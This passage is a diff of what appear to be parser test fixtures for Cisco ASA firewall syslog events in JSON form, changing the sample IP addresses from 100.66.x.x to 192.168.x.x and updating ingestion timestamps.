+ "ingested": "2021-12-09T13:32:20.604699900Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:192.168.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs",
 "code": "302014",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -14593,8 +14593,8 @@
 },
 "destination": {
 "port": 8301,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1297,
@@ -14634,7 +14634,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14642,8 +14642,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095073958Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301",
+ "ingested": "2021-12-09T13:32:20.604704500Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14676,8 +14676,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14712,7 +14712,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14721,8 +14721,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095075685Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)",
+ "ingested": "2021-12-09T13:32:20.604708Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14738,7 +14738,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11831",
 "source_interface": "outside",
 "mapped_destination_port": 1297
@@ -14755,8 +14755,8 @@
 },
 "destination": {
 "port": 8302,
- "address": "100.66.98.44",
- "ip": "100.66.98.44"
+ "address": "192.168.98.44",
+ "ip": "192.168.98.44"
 },
 "source": {
 "port": 1298,
@@ -14796,7 +14796,7 @@
 ],
 "ip": [
 "172.31.98.44",
- "100.66.98.44"
+ "192.168.98.44"
 ]
 },
 "host": {
@@ -14804,8 +14804,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095077426Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302",
+ "ingested": "2021-12-09T13:32:20.604712200Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302",
 "code": "305011",
 "kind": "event",
 "action": "firewall-rule",
@@ -14838,8 +14838,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -14874,7 +14874,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -14883,8 +14883,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095079166Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)",
+ "ingested": "2021-12-09T13:32:20.604717700Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)",
 "code": "302013",
 "kind": "event",
 "action": "firewall-rule",
@@ -14900,7 +14900,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 80,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.98.165",
+ "mapped_source_ip": "192.168.98.165",
 "connection_id": "11832",
 "source_interface": "outside",
 "mapped_destination_port": 1298
@@ -14922,8 +14922,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.179.9",
- "ip": "100.66.179.9"
+ "address": "192.168.179.9",
+ "ip": "192.168.179.9"
 },
 "tags": [
 "preserve_original_event"
@@ -14958,7 +14958,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.179.9",
+ "192.168.179.9",
 "172.31.98.44"
 ]
 },
@@ -14967,8 +14967,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:06:25.095080912Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
+ "ingested": "2021-12-09T13:32:20.604722800Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:192.168.179.9/53 (192.168.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)",
 "code": "302015",
 "kind": "event",
 "action": "firewall-rule",
@@ -14984,7 +14984,7 @@
 "destination_interface": "inside",
 "mapped_source_port": 53,
 "mapped_destination_ip": "172.31.98.44",
- "mapped_source_ip": "100.66.179.9",
+ "mapped_source_ip": "192.168.179.9",
 "connection_id": "11833",
 "source_interface": "outside",
 "mapped_destination_port": 56132
@@ -15006,8 +15006,8 @@
 },
 "source": {
 "port": 53,
- "address": "100.66.179.9",
- "ip": "100.66.179.9"
+ "address": "192.168.179.9",
+ "ip": "192.168.179.9"
 },
 "tags": [
 "preserve_original_event"
@@ -15042,7 +15042,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.179.9",
+ "192.168.179.9",
 "172.31.98.44"
 ]
 },
@@ -15052,8 +15052,8 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-07-19T09:06:25.095082702Z",
- "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
+ "ingested": "2021-12-09T13:32:20.604726400Z",
+ "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:192.168.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150",
 "code": "302016",
 "kind": "event",
 "start": "2018-10-10T12:34:56.000Z",
@@ -15090,8 +15090,8 @@
 },
 "source": {
 "port": 80,
- "address": "100.66.98.165",
- "ip": "100.66.98.165"
+ "address": "192.168.98.165",
+ "ip": "192.168.98.165"
 },
 "tags": [
 "preserve_original_event"
@@ -15126,7 +15126,7 @@
 "localhost"
 ],
 "ip": [
- "100.66.98.165",
+ "192.168.98.165",
 "172.31.98.44"
 ]
 },
@@ -15137,8 +15137,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095084487Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", + "ingested": "2021-12-09T13:32:20.604730500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:192.168.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15170,8 +15170,8 @@ }, "destination": { "port": 8303, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1299, @@ -15211,7 +15211,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15219,8 +15219,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095086211Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303", + "ingested": "2021-12-09T13:32:20.604735300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15253,8 +15253,8 @@ }, "source": { "port": 80, - "address": "100.66.247.99", - "ip": "100.66.247.99" + "address": "192.168.247.99", + "ip": "192.168.247.99" }, "tags": [ "preserve_original_event" @@ -15289,7 +15289,7 @@ "localhost" ], "ip": [ - "100.66.247.99", + "192.168.247.99", "172.31.98.44" ] }, 
@@ -15298,8 +15298,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095087942Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", + "ingested": "2021-12-09T13:32:20.604739100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:192.168.247.99/80 (192.168.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15315,7 +15315,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.247.99", + "mapped_source_ip": "192.168.247.99", "connection_id": "11834", "source_interface": "outside", "mapped_destination_port": 1299 @@ -15332,8 +15332,8 @@ }, "destination": { "port": 8304, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1300, @@ -15373,7 +15373,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15381,8 +15381,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095089683Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304", + "ingested": "2021-12-09T13:32:20.604743500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15415,8 +15415,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15451,7 +15451,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15460,8 +15460,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095091477Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", + "ingested": "2021-12-09T13:32:20.604748900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15477,7 +15477,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11835", "source_interface": "outside", "mapped_destination_port": 1300 @@ -15499,8 +15499,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15535,7 +15535,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15546,8 +15546,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095093346Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", + "ingested": "2021-12-09T13:32:20.604754400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:192.168.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -15584,8 +15584,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15620,7 +15620,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15631,8 +15631,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-07-19T09:06:25.095095112Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", + "ingested": "2021-12-09T13:32:20.604759800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:192.168.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -15664,8 +15664,8 @@ }, "destination": { "port": 8305, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1301, @@ -15705,7 +15705,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15713,8 +15713,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095096898Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305", + "ingested": "2021-12-09T13:32:20.604765100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -15747,8 +15747,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" 
@@ -15783,7 +15783,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15792,8 +15792,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095098659Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", + "ingested": "2021-12-09T13:32:20.604770500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15809,7 +15809,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11836", "source_interface": "outside", "mapped_destination_port": 1301 @@ -15826,8 +15826,8 @@ }, "destination": { "port": 8306, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1302, @@ -15867,7 +15867,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -15875,8 +15875,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095101016Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306", + "ingested": "2021-12-09T13:32:20.604775800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306", "code": "305011", "kind": "event", "action": "firewall-rule", 
@@ -15909,8 +15909,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -15945,7 +15945,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -15954,8 +15954,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095102796Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", + "ingested": "2021-12-09T13:32:20.604842100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -15971,7 +15971,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11837", "source_interface": "outside", "mapped_destination_port": 1302 @@ -16009,8 +16009,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095104768Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604850100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16056,8 +16056,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095106483Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604856100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16103,8 +16103,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095108211Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604861800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16150,8 +16150,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095121279Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604866300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16197,8 +16197,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095123681Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604870900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16244,8 +16244,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095125600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604890300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:192.168.98.44/8285 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16291,8 +16291,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095127494Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604895Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:192.168.98.44/8286 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16338,8 +16338,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095129365Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604900500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:192.168.98.44/8287 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16385,8 +16385,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095131231Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604905900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:192.168.98.44/8288 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16432,8 +16432,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095133051Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604911300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:192.168.98.44/8289 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16479,8 +16479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095134905Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604916700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:192.168.98.44/8290 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16526,8 +16526,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095136716Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604922100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:192.168.98.44/8291 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16573,8 +16573,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095138553Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604927400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:192.168.98.44/8292 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", 
@@ -16620,8 +16620,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095140350Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604932700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:192.168.98.44/8297 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16667,8 +16667,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095142233Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30", + "ingested": "2021-12-09T13:32:20.604940300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:192.168.98.44/8298 duration 0:00:30", "code": "305012", "kind": "event", "action": "firewall-rule", @@ -16693,8 +16693,8 @@ }, "destination": { "port": 8308, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1304, @@ -16734,7 +16734,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -16742,8 +16742,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095144068Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308", + "ingested": "2021-12-09T13:32:20.604946Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:192.168.98.44/8308", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -16776,8 +16776,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -16812,7 +16812,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -16821,8 +16821,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.095145899Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", + "ingested": "2021-12-09T13:32:20.604951400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -16838,7 